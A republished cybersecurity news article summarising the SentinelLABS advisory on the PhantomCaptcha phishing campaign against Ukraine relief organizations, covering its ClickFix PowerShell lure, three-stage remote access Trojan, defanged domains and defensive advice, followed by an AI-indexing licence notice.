PhantomCaptcha Campaign Targets Ukraine Relief Organizations – Against Invaders – Notícias de CyberSecurity para humanos.

PhantomCaptcha Campaign Targets Ukraine Relief Organizations - Against Invaders - Notícias de CyberSecurity para humanos.

A coordinated phishing campaign aimed at humanitarian and government organizations supporting Ukraine’s war relief efforts has been uncovered by cybersecurity researchers.

The operation, known as “PhantomCaptcha,”impersonated the Ukrainian President’s Office to trick victims into downloading malware through a malicious PDF document.

According to a new advisory by SentinelLABS and the Digital Security Lab of Ukraine published today, the attack began on October 82025, when targeted employees from the International Red Cross, UNICEF, the Norwegian Refugee Council and several Ukrainian regional administrations received phishing emails.

These messages contained an eight-page PDF masquerading as an official government memo. Once opened, the document directed users to a fake Zoom site, zoomconference[.]app, which hosted malicious scripts on infrastructure owned by a Russian provider.

Victims were presented with what appeared to be a Cloudflare verification page. The page prompted them to perform several actions that ultimately executed a PowerShell command, allowing attackers to install malware onto their systems.

This technique, known as “ClickFix”or “Paste and Run,”relies on users unknowingly running commands themselves, bypassing standard security checks.

The malware operated in three separate stages:

  • Stage 1: A heavily obfuscated downloader script exceeding 500KB that retrieved additional payloads

  • Stage 2: A reconnaissance module gathering system identifiers, usernames and domain information

  • Stage 3: A WebSocket-based remote access Trojan (RAT) enabling command execution and data exfiltration

Researchers noted the infrastructure was active for just one day, reflecting a deliberate strategy to evade detection. However, backend servers remained online to manage infected devices.

Read more on malware delivery techniques and social engineering trends: AI-Driven Social Engineering Top Cyber Threat for 2026, ISACA Survey Reveals

Further analysis linked PhantomCaptcha to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storageservices.

One such domain, princess-mens[.]click, distributed an app called princess.apk, which collected contacts, media, SIM data and location details from infected devices. Although connected, this mobile vector is being tracked as a separate activity cluster.

“The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control,”SentinelLABS said.

“The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.”

To defend against this threat, the company advised users to remain cautious of instructions requiring them to paste commands into Windows Run dialogs.

Organizations should also monitor PowerShell activity, enforce execution policy restrictions and track suspicious WebSocket connections, particularly those associated with newly registered or impersonated domains.

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology:LLMs” is the correct English acronym for Large Language Models.